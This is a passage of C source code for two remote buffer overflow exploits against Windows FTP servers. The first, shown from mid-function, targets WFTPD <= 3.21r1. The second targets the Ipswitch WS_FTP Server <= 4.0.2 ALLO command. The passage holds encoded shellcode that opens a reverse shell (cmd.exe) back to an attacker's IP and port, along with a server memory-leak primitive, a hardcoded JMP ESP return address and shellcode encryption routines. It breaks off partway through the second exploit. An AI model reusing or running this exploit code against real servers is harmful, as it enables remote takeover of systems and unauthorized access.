!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), badval, 4))
__leave;
break;
#endif
}
if (!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), shellcode, sizeof(shlc_code)-1) || // our code
!add_bytes(sndbuf, sndbufidx, sizeof(sndbuf), " \r\n", 3)) // req + end of line
__leave;
if (!check_invd_bytes("shellcode", shellcode, sizeof(shlc_code)-1) ||
!check_invd_bytes("ret_addr", ret_addr, sizeof(ret_addr)-1) ||
!check_invd_bytes("sndbuf", sndbuf+5, sndbufidx-3-5))
__leave;
in_addr a; a.s_addr = htonl(sip);
printf("[+] Sending shellcode which will connect to %s:%u...\n", inet_ntoa(a), sport);
if (!sendb(s, sndbuf, sndbufidx, 0))
{
printf("[-] Failed to send shellcode\n");
__leave;
}
printf("[+] Shellcode sent successfully\n");
ret = 1;
}
__finally
{
delete shellcode;
}
if (ret == 0)
printf("[-] Can't exploit the vulnerability\n");
return ret;
}
int login(SOCKET s, const char* username, const char* userpass)
{
printf("[+] Logging in...\n");
int code;
if (!ignorerd(s) || !sends(s, "USER ", 0) || !sends(s, username, 0) ||
!sends(s, "\r\n", 0) || (code = get_reply_code(s)) < 0)
{
printf("[-] Failed to log in #1\n");
return 0;
}
if (code == 331)
{
if (!sends(s, "PASS ", 0) || !sends(s, userpass, 0) ||
!sends(s, "\r\n", 0) || (code = get_reply_code(s)) < 0)
{
printf("[-] Failed to log in #2\n");
return 0;
}
}
if (code != 230)
{
printf("[-] Failed to log in. Code %3u\n", code);
return 0;
}
printf("[+] Logged in\n");
return 1;
}
void show_help(char* pname)
{
printf("%s <ip> <port> <sip> <sport> [-u username] [-p userpass] [-v <p321|p320|321|310>]\n", pname);
exit(1);
}
int main(int argc, char** argv)
{
printf("WFTPD <= v3.21r1 buffer overflow exploit, (c) axl 2004, [email protected]\n");
WSADATA wsa;
if (WSAStartup(0x0202, &wsa))
return 1;
if (argc < 5)
show_help(argv[0]);
unsigned long ip = ntohl(inet_addr(argv[1]));
unsigned short port = (unsigned short)atoi(argv[2]);
unsigned long sip = ntohl(inet_addr(argv[3]));
unsigned short sport = (unsigned short)atoi(argv[4]);
const char* username = "anonymous";
const char* userpass = "axl";
for (int i = 5; i < argc; i++)
{
if (!strcmp(argv[i], "-u") && i + 1 < argc)
{
username = argv[++i];
}
else if (!strcmp(argv[i], "-p") && i + 1 < argc)
{
userpass = argv[++i];
}
else if (!strcmp(argv[i], "-v") && i + 1 < argc)
{
if (!stricmp(argv[i+1], "p321"))
ftpver = WFTPD_PRO_321_TRIAL;
else if (!stricmp(argv[i+1], "p320"))
ftpver = WFTPD_PRO_320_TRIAL;
else if (!stricmp(argv[i+1], "321"))
ftpver = WFTPD_321_TRIAL;
else if (!stricmp(argv[i+1], "310"))
ftpver = WFTPD_310_TRIAL;
else
show_help(argv[0]);
i++;
}
else
show_help(argv[0]);
}
if (!ip || !port || !sip || !sport)
show_help(argv[0]);
sockaddr_in saddr;
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
saddr.sin_addr.s_addr = htonl(ip);
SOCKET s = INVALID_SOCKET;
__try
{
in_addr a; a.s_addr = htonl(ip);
printf("[+] Connecting to %s:%u...\n", inet_ntoa(a), port);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0 || connect(s, (sockaddr*)&saddr, sizeof(saddr)) < 0)
{
printf("[-] Could not connect\n");
__leave;
}
printf("[+] Connected\n");
int code = get_reply_code(s);
if (code != 220)
{
printf("[-] Got reply %3u\n", code);
__leave;
}
if (!login(s, username, userpass))
__leave;
if (!exploit(s, sip, sport))
printf("[-] Lucky bastards...\n");
else
printf("[+] Santa's watching you!\n");
}
__finally
{
if (s != INVALID_SOCKET)
closesocket(s);
}
return 0;
}
// [2004-02-29]
21 WS_FTP Server <= 4.0.2 ALLO Remote Buffer Overflow Exploit
/*
* Ipswitch WS_FTP Server <= 4.0.2 ALLO exploit
* (c)2004 Hugh Mann [email protected]
*
* This exploit has been tested with WS_FTP Server 4.0.2.EVAL, Windows XP SP1
*
* NOTE:
* - The exploit assumes the user has a total file size limit. If the user only has
* a max number of files limit you will need to rewrite parts of this exploit for
* it to work.
*/
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
const char* temp_file = "#t#t#t";
#define ALLO_STRING "ALLO 18446744073709551615"
/*
* Assume all addresses >= this address to be invalid addresses. If the exploit doesn't work,
* try changing it to a larger value, eg. 0x80000000 or 0xC0000000.
*/
const MAX_ADDR = 0x80000000;
/*
* Size of each thread's stack space. From iFtpSvc.exe PE header. Must be a power of 2.
* Should not be necessary to change this since practically all PE files use the default
* size (1MB).
*/
const SERV_STK_SIZE = 0x00100000;
/*
* This is the lower bits of ESP when the ALLO handler is called. This is very WS_FTP Server
* version dependent. Should be = ESP (mod SERV_STK_SIZE)
*/
const SERV_STK_OFFS = 0x0007F208;
/*
* This is the offset of the "this" pointer relative to SERV_STK_OFFS in the ALLO handler.
*/
const SERV_STK_THIS_OFFS = -(0x210+4); // EBP is saved
/*
* Offset of username relative to the "this" pointer
*/
const SERV_THIS_USERNAME_OFFS = 0x9F8;
/*
* Offset of FTP cmd buf relative to the "this" pointer
*/
const SERV_THIS_CMDBUF_OFFS = 0x1F8;
/*
* Offset of EIP relative to vulnerable buffer
*/
const SERV_BUF_EIP = 0x110;
/*
* Return addresses to JMP ESP instruction. Must contain bytes that are valid shellcode characters.
*/
#if 1
const char* ret_addr = "\xD3\xD9\xE2\x77"; // advapi32.dll (08/29/2002), WinXP SP1
#else
// mswsock.dll is not loaded by WS_FTP Server, and I haven't investigated which DLL actually loads it
// so I don't use this possibly better return address.
const char* ret_addr = "\x3D\x40\xA5\x71"; // mswsock.dll (08/23/2001), WinXP SP1 and probably WinXP too
#endif
#define MAXLINE 0x1000
static char inbuf[MAXLINE];
static unsigned inoffs = 0;
static char last_line[MAXLINE];
static int output_all = 0;
static int quite_you = 0;
void msg2(const char *format, ...)
{
va_list args;
va_start(args, format);
vfprintf(stdout, format, args);
}
void msg(const char *format, ...)
{
if (quite_you && output_all == 0)
return;
va_list args;
va_start(args, format);
vfprintf(stdout, format, args);
}
int isrd(SOCKET s)
{
fd_set r;
FD_ZERO(&r);
FD_SET(s, &r);
timeval t = {0, 0};
int ret = select(1, &r, NULL, NULL, &t);
if (ret < 0)
return 0;
else
return ret != 0;
}
void print_all(const char* buf, int len = -1)
{
if (len == -1)
len = (int)strlen(buf);
for (int i = 0; i < len; i++)
putc(buf[i], stdout);
}
int _recv(SOCKET s, char* buf, int len, int flags)
{
int ret = recv(s, buf, len, flags);
if (!output_all || ret < 0)
return ret;
print_all(buf, ret);
return ret;
}
int get_line(SOCKET s, char* string, unsigned len)
{
char* nl;
while ((nl = (char*)memchr(inbuf, '\n', inoffs)) == NULL)
{
if (inoffs >= sizeof(inbuf))
{
msg("[-] Too long line\n");
return 0;
}
int len = _recv(s, &inbuf[inoffs], sizeof(inbuf) - inoffs, 0);
if (len <= 0)
{
msg("[-] Error receiving data\n");
return 0;
}
inoffs += len;
}
strncpy(last_line, inbuf, sizeof(last_line));
last_line[sizeof(last_line)-1] = 0;
unsigned nlidx = (unsigned)(ULONG_PTR)(nl - inbuf);
if (nlidx >= len)
{
msg("[-] Too small caller buffer\n");
return 0;
}
memcpy(string, inbuf, nlidx);
string[nlidx] = 0;
if (nlidx > 0 && string[nlidx-1] == '\r')
string[nlidx-1] = 0;
if (nlidx + 1 >= inoffs)
inoffs = 0;
else
{
memcpy(inbuf, &inbuf[nlidx+1], inoffs - (nlidx + 1));
inoffs -= nlidx + 1;
}
return 1;
}
int ignorerd(SOCKET s)
{
inoffs = 0;
while (1)
{
if (!isrd(s))
return 1;
if (_recv(s, inbuf, sizeof(inbuf), 0) < 0)
return 0;
}
}
int get_reply_code(SOCKET s, int (*func)(void* data, char* line) = NULL, void* data = NULL)
{
char line[MAXLINE];
if (!get_line(s, line, sizeof(line)))
{
msg("[-] Could not get status code\n");
return -1;
}
if (func)
func(data, line);
char c = line[3];
line[3] = 0;
int code;
if (!(c == ' ' || c == '-') || strlen(line) != 3 || !(code = atoi(line)))
{
msg("[-] Weird reply\n");
return -1;
}
char endline[4];
memcpy(endline, line, 3);
endline[3] = ' ';
if (c == '-')
{
while (1)
{
if (!get_line(s, line, sizeof(line)))
{
msg("[-] Could not get next line\n");
return -1;
}
if (func)
func(data, line);
if (!memcmp(line, endline, sizeof(endline)))
break;
}
}
return code;
}
int sendb(SOCKET s, const char* buf, int len, int flags = 0)
{
while (len)
{
int l = send(s, buf, len, flags);
if (l <= 0)
break;
len -= l;
buf += l;
}
return len == 0;
}
int sends(SOCKET s, const char* buf, int flags = 0)
{
return sendb(s, buf, (int)strlen(buf), flags);
}
int _send_cmd(SOCKET s, const char* fmt, va_list args, int need_reply)
{
char buf[MAXLINE];
buf[sizeof(buf)-1] = 0;
if (_vsnprintf(buf, sizeof(buf), fmt, args) < 0 || buf[sizeof(buf)-1] != 0)
{
msg("[-] Buffer overflow\n");
return -1;
}
if (output_all)
print_all(buf);
if (!ignorerd(s) || !sends(s, buf))
return -1;
if (need_reply)
return get_reply_code(s);
return 0;
}
int send_cmd(SOCKET s, const char* fmt, ...)
{
va_list args;
va_start(args, fmt);
return _send_cmd(s, fmt, args, 1);
}
int send_cmd2(SOCKET s, const char* fmt, ...)
{
va_list args;
va_start(args, fmt);
return _send_cmd(s, fmt, args, 0);
}
int add_bytes(void* dst, int& dstoffs, int dstlen, const void* src, int srclen)
{
if (dstoffs < 0 || dstoffs + srclen > dstlen || dstoffs + srclen < dstoffs)
{
msg("[-] Buffer overflow ;)\n");
return 0;
}
memcpy((char*)dst+dstoffs, src, srclen);
dstoffs += srclen;
return 1;
}
int check_invd_bytes(const char* name, const void* buf, int buflen, int (*chkchar)(char c))
{
const char* b = (const char*)buf;
for (int i = 0; i < buflen; i++)
{
if (!chkchar(b[i]))
{
msg("[-] %s[%u] (%02X) is an invalid character\n", name, i, (unsigned char)b[i]);
return 0;
}
}
return 1;
}
int enc_byte(char& c, char& k, int (*chkchar)(char c))
{
for (int i = 0; i < 0x100; i++)
{
if (!chkchar(c ^ i) || !chkchar(i))
continue;
c ^= i;
k = i;
return 1;
}
msg("[-] Could not find encryption key for byte %02X\n", c);
return 0;
}
int get_enc_key(char* buf, int size, int offs, int step, int (*chkchar)(char c), int ignore1 = -1, int ignore2 = -1)
{
for (int i = 0; i < 0x100; i++)
{
if (!chkchar(i))
continue;
for (int j = offs; j < size; j += step)
{
if (ignore1 != -1 && (j >= ignore1 && j <= ignore2))
continue; // These bytes aren't encrypted
if (!chkchar(buf[j] ^ i))
break;
}
if (j < size)
continue;
return i;
}
msg("[-] Could not find an encryption key\n");
return -1;
}
int login(SOCKET s, const char* username, const char* userpass)
{
msg("[+] Logging in as %s...\n", username);
int code;
if ((code = send_cmd(s, "USER %s\r\n", username)) < 0)
{
msg("[-] Failed to log in #1\n");
return 0;
}
if (code == 331)
{
if ((code = send_cmd(s, "PASS %s\r\n", userpass)) < 0)
{
msg("[-] Failed to log in #2\n");
return 0;
}
}
if (code != 230)
{
msg("[-] Failed to log in. Code %3u\n", code);
return 0;
}
msg("[+] Logged in\n");
return 1;
}
class xuser
{
public:
xuser() : s(INVALID_SOCKET) {}
~xuser() {close();}
int init(unsigned long ip, unsigned short port, const char* username, const char* userpass);
void close() {if (s >= 0) closesocket(s); s = INVALID_SOCKET;}
SOCKET sock() const {return s;}
int exploit(unsigned long sip, unsigned short sport);
int read_serv_mem_bytes(unsigned addr, void* dst, int dstlen);
int read_serv_mem_string(unsigned addr, char* dst, int dstlen);
int read_serv_mem_uint32(unsigned addr, unsigned* dst);
protected:
int read_serv_mem(unsigned addr, void* dst, int dstlen);
SOCKET s;
char username[260];
char userpass[260];
unsigned long ip;
unsigned short port;
};
/*
* XAUT code tested with WS_FTP Server 4.0.2.EVAL
*/
#define XAUT_2_KEY 0x49327576
int xaut_encrypt(char* dst, const char* src, int len, unsigned long key)
{
unsigned char keybuf[0x80*4];
for (int i = 0; i < sizeof(keybuf)/4; i++)
{
keybuf[i*4+0] = (char)key;
keybuf[i*4+1] = (char)(key >> 8);
keybuf[i*4+2] = (char)(key >> 16);
keybuf[i*4+3] = (char)(key >> 24);
}
for (int i = 0; i < len; i++)
{
if (i >= sizeof(keybuf))
{
msg("[-] xaut_encrypt: Too long input buffer\n");
return 0;
}
*dst++ = *src++ ^ keybuf[i];
}
return 1;
}
char* xaut_unpack(char* src, int len, int delete_it)
{
char* dst = new char[len*2 + 1];
for (int i = 0; i < len; i++)
{
dst[i*2+0] = ((src[i] >> 4) & 0x0F) + 0x35;
dst[i*2+1] = (src[i] & 0x0F) + 0x31;
}
dst[i*2] = 0;
if (delete_it)
delete src;
return dst;
}
int xaut_login(SOCKET s, int d, const char* username, const char* password, unsigned long key)
{
msg("[+] Logging in [XAUT] as %s...\n", username);
int ret = 0;
char* dst = NULL;
__try
{
const char* middle = ":";
dst = new char[strlen(username) + strlen(middle) + strlen(password) + 1];
strcpy(dst, username);
strcat(dst, middle);
strcat(dst, password);
int len = (int)strlen(dst);
if ((d == 2 && !xaut_encrypt(dst, dst, len, XAUT_2_KEY)) || !xaut_encrypt(dst, dst, len, key))
__leave;
dst = xaut_unpack(dst, len, 1);
if (send_cmd(s, "XAUT %d %s\r\n", d, dst) != 230)
__leave;
ret = 1;
}
__finally
{
delete dst;
}
if (!ret)
msg("[-] Failed to log in\n");
else
msg("[+] Logged in\n");
return ret;
}
struct my_data
{
unsigned long key;
int done_that;
char hostname[256];
};
int line_callback(void* data, char* line)
{
my_data* m = (my_data*)data;
if (m->done_that)
return 1;
/*
* Looking for a line similar to:
*
* "220-FTP_HOSTNAME X2 WS_FTP Server 4.0.2.EVAL (41541732)\r\n"
*/
char* s, *e;
if (strncmp(line, "220", 3) || !strstr(line, "WS_FTP Server") ||
(s = strrchr(line, '(')) == NULL || (e = strchr(s, ')')) == NULL)
return 1;
char buf[0x10];
int len = (int)(ULONG_PTR)(e - (s+1));
if (len >= sizeof(buf) || len > 10)
return 1;
memcpy(buf, s+1, len);
buf[len] = 0;
for (int i = 0; i < len; i++)
{
if (!isdigit((unsigned char)buf[i]))
return 1;
}
m->key = atol(buf);
for (int i = 4, len = (int)strlen(line); i < len; i++)
{
if (i-4 >= sizeof(m->hostname))
return 1;
m->hostname[i-4] = line[i];
if (line[i] == ' ')
break;
}
m->hostname[i-4] = 0;
if (m->hostname[0] == 0)
return 1;
m->done_that = 1;
return 1;
}
int xuser::init(unsigned long _ip, unsigned short _port, const char* _username, const char* _userpass)
{
ip = _ip;
port = _port;
close();
strncpy(username, _username, sizeof(username));
if (username[sizeof(username)-1] != 0)
{
msg("[-] username too long\n");
return 0;
}
strncpy(userpass, _userpass, sizeof(userpass));
if (userpass[sizeof(userpass)-1] != 0)
{
msg("[-] userpass too long\n");
return 0;
}
sockaddr_in saddr;
memset(&saddr, 0, sizeof(saddr));
saddr.sin_family = AF_INET;
saddr.sin_port = htons(port);
saddr.sin_addr.s_addr = htonl(ip);
in_addr a; a.s_addr = htonl(ip);
msg("[+] Connecting to %s:%u...\n", inet_ntoa(a), port);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0 || connect(s, (sockaddr*)&saddr, sizeof(saddr)) < 0)
{
msg("[-] Could not connect\n");
return 0;
}
msg("[+] Connected\n");
my_data m;
memset(&m, 0, sizeof(m));
int code = get_reply_code(s, line_callback, &m);
if (code != 220)
{
msg("[-] Got reply %3u\n", code);
return 0;
}
else if (!m.done_that)
{
msg("[-] Could not find XAUT key or host name => Not a WS_FTP Server\n");
return 0;
}
if (!xaut_login(s, 0, username, userpass, m.key) && !login(s, username, userpass))
return 0;
// Don't want UTF8 conversions
if (send_cmd(s, "LANG en\r\n") != 200)
{
msg("[-] Apparently they don't understand the english language\n");
return 0;
}
if (send_cmd(s, "NOOP step into the light\r\n") != 200)
{
msg("[-] C4n't k1ll 4 z0mbie\n");
return 0;
}
return 1;
}
SOCKET get_data_sock(SOCKET s, const char* filename, const char* cmd)
{
SOCKET sd = INVALID_SOCKET;
int error = 1;
__try
{
sockaddr_in saddr;
int len = sizeof(saddr);
if (getsockname(s, (sockaddr*)&saddr, &len) < 0 || len != sizeof(saddr) ||
(sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
__leave;
sockaddr_in daddr;
memset(&daddr, 0, sizeof(daddr));
daddr.sin_family = AF_INET;
daddr.sin_port = 0;
daddr.sin_addr.s_addr = saddr.sin_addr.s_addr;
len = sizeof(daddr);
if (bind(sd, (sockaddr*)&daddr, sizeof(daddr)) < 0 || listen(sd, 1) < 0 ||
getsockname(sd, (sockaddr*)&daddr, &len) < 0 || len != sizeof(daddr))
__leave;
unsigned long ip = ntohl(daddr.sin_addr.s_addr);
unsigned short port = ntohs(daddr.sin_port);
if (send_cmd(s, "PORT %u,%u,%u,%u,%u,%u\r\n",
(unsigned char)(ip >> 24),
(unsigned char)(ip >> 16),
(unsigned char)(ip >> 8),
(unsigned char)ip,
(unsigned char)(port >> 8),
(unsigned char)port) != 200)
__leave;
if (send_cmd2(s, "%s %s\r\n", cmd, filename) < 0)
__leave;
msg("[+] Waiting for server to connect...\n");
SOCKET sa;
sockaddr_in aaddr;
len = sizeof(aaddr);
if ((sa = accept(sd, (sockaddr*)&aaddr, &len)) < 0)
__leave;
closesocket(sd);
sd = sa;
if (get_reply_code(s) != 150)
__leave;
error = 0;
}
__finally
{
if (error)
{
msg("[-] Could not create data connection, %u\n", GetLastError());
closesocket(sd);
sd = INVALID_SOCKET;
}
else
msg("[+] Server connected\n");
}
return sd;
}
int create_file(SOCKET s, const char* tmpname, unsigned size = 1)
{
int ret = 0;
SOCKET sd = INVALID_SOCKET;
__try
{
if (size > 1 && send_cmd(s, "REST %u\r\n", size) != 350)
__leave;
if ((sd = get_data_sock(s, tmpname, "STOR")) < 0)
__leave;
ret = 1;
}
__finally
{
if (sd >= 0)
closesocket(sd);
}
if (ret && get_reply_code(s) != 226)
ret = 0;
return ret;
}
const unsigned int shlc2_offs_encstart = 0x0000002B;
const unsigned int shlc2_offs_encend = 0x000001B8;
const unsigned int shlc2_offs_enckey = 0x00000025;
unsigned char shlc2_code[] =
"\xEB\x16\x78\x56\x34\x12\x78\x56\x34\x12\x78\x56\x 34\x12\x78\x56"
"\x34\x12\x5B\x53\x83\xEB\x1D\xC3\xE8\xF5\xFF\xFF\x FF\x33\xC9\xB1"
"\x64\x81\x74\x8B\x27\x55\x55\x55\x55\xE2\xF6\xFC\x 8B\x43\x0A\x31"
"\x43\x02\x8B\x43\x0E\x31\x43\x06\x89\x4B\x0A\x89\x 4B\x0E\x64\x8B"
"\x35\x30\x00\x00\x00\x8B\x76\x0C\x8B\x76\x1C\xAD\x 8B\x68\x08\x8D"
"\x83\x67\x01\x00\x00\x55\xE8\xB7\x00\x00\x00\x68\x 33\x32\x00\x00"
"\x68\x77\x73\x32\x5F\x54\xFF\xD0\x96\x8D\x83\x74\x 01\x00\x00\x56"
"\xE8\x9D\x00\x00\x00\x81\xEC\x90\x01\x00\x00\x54\x 68\x01\x01\x00"
"\x00\xFF\xD0\x8D\x83\x7F\x01\x00\x00\x56\xE8\x83\x 00\x00\x00\x33"
"\xC9\x51\x51\x51\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x 97\x8D\x83\x8A"
"\x01\x00\x00\x56\xE8\x69\x00\x00\x00\x33\xC9\x51\x 51\x51\x51\x6A"
"\x10\x8D\x4B\x02\x51\x57\xFF\xD0\xB9\x54\x00\x00\x 00\x2B\xE1\x88"
"\x6C\x0C\xFF\xE2\xFA\xC6\x44\x24\x10\x44\x41\x88\x 4C\x24\x3C\x88"
"\x4C\x24\x3D\x89\x7C\x24\x48\x89\x7C\x24\x4C\x89\x 7C\x24\x50\x49"
"\x8D\x44\x24\x10\x54\x50\x51\x51\x51\x6A\x01\x51\x 51\x8D\x83\xA4"
"\x01\x00\x00\x50\x51\x8D\x83\x95\x01\x00\x00\x55\x E8\x11\x00\x00"
"\x00\x59\xFF\xD0\x8D\x83\xAC\x01\x00\x00\x55\xE8\x 02\x00\x00\x00"
"\xFF\xD0\x60\x8B\x7C\x24\x24\x8D\x6F\x78\x03\x6F\x 3C\x8B\x6D\x00"
"\x03\xEF\x83\xC9\xFF\x41\x3B\x4D\x18\x72\x0B\x64\x 89\x0D\x00\x00"
"\x00\x00\x8B\xE1\xFF\xE4\x8B\x5D\x20\x03\xDF\x8B\x 1C\x8B\x03\xDF"
"\x8B\x74\x24\x1C\xAC\x38\x03\x75\xDC\x43\x84\xC0\x 75\xF6\x8B\x5D"
"\x24\x03\xDF\x0F\xB7\x0C\x4B\x8B\x5D\x1C\x03\xDF\x 8B\x0C\x8B\x03"
"\xCF\x89\x4C\x24\x1C\x61\xC3\x4C\x6F\x61\x64\x4C\x 69\x62\x72\x61"
"\x72\x79\x41\x00\x57\x53\x41\x53\x74\x61\x72\x74\x 75\x70\x00\x57"
"\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x57\x53\x 41\x43\x6F\x6E"
"\x6E\x65\x63\x74\x00\x43\x72\x65\x61\x74\x65\x50\x 72\x6F\x63\x65"
"\x73\x73\x41\x00\x63\x6D\x64\x2E\x65\x78\x65\x00\x 45\x78\x69\x74"
"\x50\x72\x6F\x63\x65\x73\x73\x00";
int is_valid_shlc2(char c)
{
return c != 0;
}
struct tfs_data
{
tfs_data() : tot_size(0), line(0), ok(0) {}
int line;
unsigned tot_size;
int ok;
};
int tfs_line_callback(void* data, char* line)
{
tfs_data* m = (tfs_data*)data;
if (++m->line != 1)
return 1;
if (strncmp(line, "250-", 4) ||
(m->tot_size = atoi(line+4)) == 0)
return 1;
m->ok = 1;
return 1;
}
int get_user_total_file_size(SOCKET s, unsigned& tot_size)
{
int ret = 0;
SOCKET sd = INVALID_SOCKET;
__try
{
/*
* Create a $message.txt file
*/
if ((sd = get_data_sock(s, "$message.txt", "STOR")) < 0 ||
send(sd, "%z", 2, 0) != 2)
__leave;
closesocket(sd);
sd = INVALID_SOCKET;
if (get_reply_code(s) != 226)
__leave;
tfs_data m;
const DWORD max_wait = 10000;
for (DWORD tc = GetTickCount(); GetTickCount() - tc < max_wait; )
{
if (send_cmd2(s, "CWD .\r\n") < 0)
__leave;
m.ok = m.line = 0;
int code = get_reply_code(s, tfs_line_callback, &m);
if (code != 500)
break;
}
if (!m.ok)
__leave;
tot_size = m.tot_size;
ret = 1;
}
__finally
{
if (sd >= 0)
closesocket(sd);
}
if (!ret)
msg("[-] Failed to get user total file size.\n Are you sure there's a total file size limit for this user?\n");
return ret;
}
int delete_file(SOCKET s, const char* filename)
{
DWORD tc = GetTickCount();
const DWORD wait = 10000;
while (1)
{
if (GetTickCount() - tc > wait)
return 0;
if (send_cmd(s, "STAT %s\r\n", filename) != 211)
return 1;
if (send_cmd(s, "DELE %s\r\n", filename) < 0)
return 0;
}
}
int create_file_for_addr(SOCKET s, unsigned addr)
{
int ret = 0;
__try
{
if (addr >= MAX_ADDR)
{
msg2("[-] Trying to read an addr (%08X) >= MAX_ADDR (%08X)\n", addr, MAX_ADDR);
__leave;
}
if (!delete_file(s, temp_file))
msg("[-] Could not delete file\n");
unsigned tot_size;
if (!get_user_total_file_size(s, tot_size))
__leave;
if (addr < tot_size)
{
msg2("[-] You must delete some user files to read address %08X\n", addr);
__leave;
}
unsigned size = addr - tot_size;
if (!create_file(s, temp_file, size))
__leave;
ret = 1;
}
__finally
{
}
return ret;
}
/*
* Returns < 0 => error
* Returns = 0 => server thread crashed
* Returns > 0 => read this many bytes into dst
*/
int xuser::read_serv_mem(unsigned addr, void* dst, int dstlen)
{
int file_created = 0;
int ret = -1;
__try
{
if (!create_file_for_addr(s, addr))
__leave;
file_created = 1;
if (send_cmd2(s, ALLO_STRING "\r\n") < 0)
__leave;
char buf[MAXLINE];
int bufsz = 0;
const char* m1 = "452 ";
int type = 0;
while (1)
{
if (bufsz >= sizeof(buf)-1)
__leave;
int size = _recv(s, &buf[bufsz], sizeof(buf)-1-bufsz, 0);
if (size < 0)
__leave;
if (size == 0)
{
if (bufsz == 0)
ret = 0;
__leave;
}
bufsz += size;
buf[bufsz] = 0;
if (bufsz >= (int)strlen(m1) && memcmp(m1, buf, strlen(m1)))
__leave; // Wrong reply code
const char* s1 = " files\r\n";
const char* s2 = " size\r\n";
if (bufsz >= (int)strlen(s1) && !memcmp(s1, &buf[bufsz-strlen(s1)], strlen(s1)))
{
type = 0;
break;
}
if (bufsz >= (int)strlen(s2) && !memcmp(s2, &buf[bufsz-strlen(s2)], strlen(s2)))
{
type = 1;
break;
}
}
const char* s = "quota exceeded; ";
const char* f1 = " size; ";
const char* f2 = " size\r\n";
const char* f3 = " files; ";
char* b = buf + strlen(m1);
if (strncmp(b, s, strlen(s)))
__leave;
char* ss = NULL, *se = NULL;
if (type == 0) // "quota exceeded; %s size; %u files\r\n"
{
ss = b + strlen(s);
for (int i = bufsz-(int)strlen(f1); ; i--)
{
if (i < 0)
__leave;
if (strncmp(f1, &buf[i], strlen(f1)))
continue; // Not equal to " size; "
se = &buf[i];
break;
}
}
else // "quota exceeded; %u files; %s size\r\n"
{
ss = strstr(buf, f3);
if (!ss)
__leave;
ss += strlen(f3);
se = &buf[bufsz-strlen(f2)];
}
if (!se || !ss || se < ss)
{
msg("[-] Buggy code\n");
__leave;
}
*se = 0;
int rd_size = (int)(UINT_PTR)(se - ss) + 1; // One 00h byte
ret = min((int)dstlen, rd_size);
memcpy(dst, ss, ret);
}
__finally
{
}
if (ret < 0)
msg("[-] Could not read server memory\n");
else if (ret == 0)
{
// Server thread crashed
if (!init(ip, port, username, userpass))
ret = -1;
}
return ret;
}
int xuser::read_serv_mem_bytes(unsigned addr, void* dst, int dstlen)
{
for (int i = 0; i < (int)dstlen; )
{
int len = read_serv_mem(addr+i, (char*)dst+i, dstlen-i);
if (len <= 0)
return len;
i += len;
}
return dstlen;
}
int xuser::read_serv_mem_string(unsigned addr, char* dst, int dstlen)
{
int len = read_serv_mem(addr, dst, dstlen);
if (len <= 0)
return len;
if (dst[len-1] != 0)
return -1;
return len;
}
int xuser::read_serv_mem_uint32(unsigned addr, unsigned* dst)
{
unsigned char tmp[4];
int ret = read_serv_mem_bytes(addr, tmp, sizeof(tmp));
if (ret <= 0)
return ret;
if (ret != sizeof(tmp))
return -1;
*dst = (tmp[3] << 24) | (tmp[2] << 16) | (tmp[1] << 8) | tmp[0];
return ret;
}
int xuser::exploit(unsigned long sip, unsigned short sport)
{
int ret = 0;
char* shellcode = NULL;
char* badbuf = NULL;
__try
{
/*
* Encrypt the shellcode
*/
const shellcode_len = sizeof(shlc2_code)-1;
shellcode = new char[shellcode_len+1];
memcpy(shellcode, shlc2_code, shellcode_len);
shellcode[shellcode_len] = 0;
shellcode[2] = (char)2;
shellcode[3] = (char)(2 >> 8);
shellcode[4] = (char)(sport >> 8);
shellcode[5] = (char)sport;
shellcode[6] = (char)(sip >> 24);
shellcode[7] = (char)(sip >> 16);
shellcode[8] = (char)(sip >> 8);
shellcode[9] = (char)sip;
for (int i = 0; i < 8; i++)
{
if (!enc_byte(shellcode[2+i], shellcode[2+8+i], is_valid_shlc2))
__leave;
}
for (int i = 0; i < 4; i++)
{
int k = get_enc_key(&shellcode[shlc2_offs_encstart], shlc2_offs_encend-shlc2_offs_encstart, i, 4, is_valid_shlc2);
if (k < 0)
__leave;
shellcode[shlc2_offs_enckey+i] = k;
}
msg("[+] Shellcode encryption key = %02X%02X%02X%02X\n",
(unsigned char)shellcode[shlc2_offs_enckey+3],
(unsigned char)shellcode[shlc2_offs_enckey+2],
(unsigned char)shellcode[shlc2_offs_enckey+1],
(unsigned char)shellcode[shlc2_offs_enckey]);
for (int i = 0; i < shlc2_offs_encend-shlc2_offs_encstart; i++)
shellcode[shlc2_offs_encstart+i] ^= shellcode[shlc2_offs_enckey + i % 4];
/*
* Do some sanity checks
*/
if (!check_invd_bytes("shellcode", shellcode, shellcode_len, is_valid_shlc2) ||
!check_invd_bytes("ret_addr", ret_addr, 4, is_valid_shlc2))
__leave;
if (!delete_file(s, temp_file))
{
msg("Could not delete file\n");
__leave;
}
unsigned tot_size;
if (!get_user_total_file_size(s, tot_size))
__leave;
msg("[+] Scanning server memory: ");
quite_you = 1;
const unsigned ADDR_START = SERV_STK_SIZE;
const unsigned ADDR_END = MAX_ADDR-1;
unsigned this_ptr;
for (unsigned addr = ADDR_START; ; addr += SERV_STK_SIZE)
{
if (addr > ADDR_END || !addr)
{
/*
* Can happen if the address of the thread's stack is not in the same position in
* memory. This most likely happens when another user logged in or it sent a FTP
* command which creates a new server thread. Try again.
*/
msg2("[-] Could not find the this ptr. Try again.\n");
__leave;
}
int rc = read_serv_mem_uint32(addr + SERV_STK_OFFS + SERV_STK_THIS_OFFS, &this_ptr);
if (rc < 0)
{
msg2("- unknown error\n"); // Error
__leave;
}
else if (rc == 0)
{
msg2("x"); // Crashed
}
else
{
msg2("."); // Bingo
char tmp[0x200];
if (this_ptr + SERV_THIS_USERNAME_OFFS < MAX_ADDR && this_ptr + SERV_THIS_CMDBUF_OFFS < MAX_ADDR &&
read_serv_mem_string(this_ptr + SERV_THIS_USERNAME_OFFS, tmp, sizeof(tmp)) > 0 &&
!strcmp(tmp, username) &&
read_serv_mem_string(this_ptr + SERV_THIS_CMDBUF_OFFS, tmp, sizeof(tmp)) > 0 &&
!strcmp(tmp, ALLO_STRING))
break;
}
}
quite_you = 0;
msg("\n[+] this = %08X\n", this_ptr);
